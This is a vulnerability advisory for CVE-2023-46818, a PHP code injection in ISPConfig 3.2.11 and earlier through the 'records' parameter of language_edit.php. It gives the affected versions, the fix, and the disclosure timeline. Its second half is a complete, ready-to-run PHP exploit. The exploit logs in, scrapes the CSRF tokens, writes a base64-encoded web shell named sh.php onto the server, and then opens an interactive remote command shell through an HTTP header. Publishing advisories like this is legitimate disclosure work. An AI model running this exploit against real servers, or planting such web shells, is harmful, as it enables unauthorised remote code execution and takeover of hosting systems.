ISPConfig 3.2.11 PHP Code Injection

`------------------------------------------------------------------------  
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
------------------------------------------------------------------------  
  
  
[-] Software Link:  
  
https://www.ispconfig.org  
  
  
[-] Affected Versions:  
  
Version 3.2.11 and prior versions.  
  
  
[-] Vulnerabilities Description:  
  
User input passed through the "records" POST parameter to  
/admin/language_edit.php is not properly sanitized before being used  
to dynamically generate PHP code that will be executed by the  
application. This can be exploited by malicious administrator users to  
inject and execute arbitrary PHP code on the web server.  
  
  
[-] Proof of Concept:  
  
https://karmainsecurity.com/pocs/CVE-2023-46818.php  
(Packet Storm Editor Note: See bottom of this file for PoC)  
  
  
[-] Solution:  
  
Upgrade to version 3.2.11p1 or later.  
  
  
[-] Disclosure Timeline:  
  
[25/10/2023] - Vendor notified  
[26/10/2023] - Version 3.2.11p1 released  
[27/10/2023] - CVE identifier assigned  
[07/12/2023] - Publication of this advisory  
  
  
[-] CVE Reference:  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-46818 to this vulnerability.  
  
  
[-] Credits:  
  
Vulnerability discovered by Egidio Romano.  
  
  
[-] Original Advisory:  
  
https://karmainsecurity.com/KIS-2023-13  
  
  
[-] Other References:  
  
https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/  
  
  
  
--- CVE-2023-46818.php PoC ---  
  
<?php  
  
/*  
------------------------------------------------------------------------  
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability  
------------------------------------------------------------------------  
  
author..............: Egidio Romano aka EgiX  
mail................: n0b0d13s[at]gmail[dot]com  
software link.......: https://www.ispconfig.org  
  
+-------------------------------------------------------------------------+  
| This proof of concept code was written for educational purpose only. |  
| Use it at your own risk. Author will be not responsible for any damage. |  
+-------------------------------------------------------------------------+  
  
[-] Vulnerability Description:  
  
User input passed through the "records" POST parameter to /admin/language_edit.php is  
not properly sanitized before being used to dynamically generate PHP code that will be  
executed by the application. This can be exploited by malicious administrator users to  
inject and execute arbitrary PHP code on the web server.  
  
[-] Original Advisory:  
  
https://karmainsecurity.com/KIS-2023-13  
*/  
  
set_time_limit(0);  
error_reporting(E_ERROR);  
  
if (!extension_loaded("curl")) die("[-] cURL extension required!\n");  
  
if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n");  
  
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];  
  
print "[+] Logging in with username '{$user}' and password '{$pass}'\n";  
  
@unlink('./cookies.txt');  
  
$ch = curl_init();  
  
curl_setopt($ch, CURLOPT_URL, "{$url}login/");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');  
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");  
  
if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");  
  
print "[+] Injecting shell\n";  
  
$__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>");  
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";  
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";  
  
curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");  
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");  
  
$res = curl_exec($ch);  
  
if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");  
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");  
  
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));  
  
curl_exec($ch);  
  
print "[+] Launching shell\n";  
  
curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");  
curl_setopt($ch, CURLOPT_POST, false);  
  
while(1)  
{  
print "\nispconfig-shell# ";  
if (($cmd = trim(fgets(STDIN))) == "exit") break;  
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);  
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");  
}  
  
`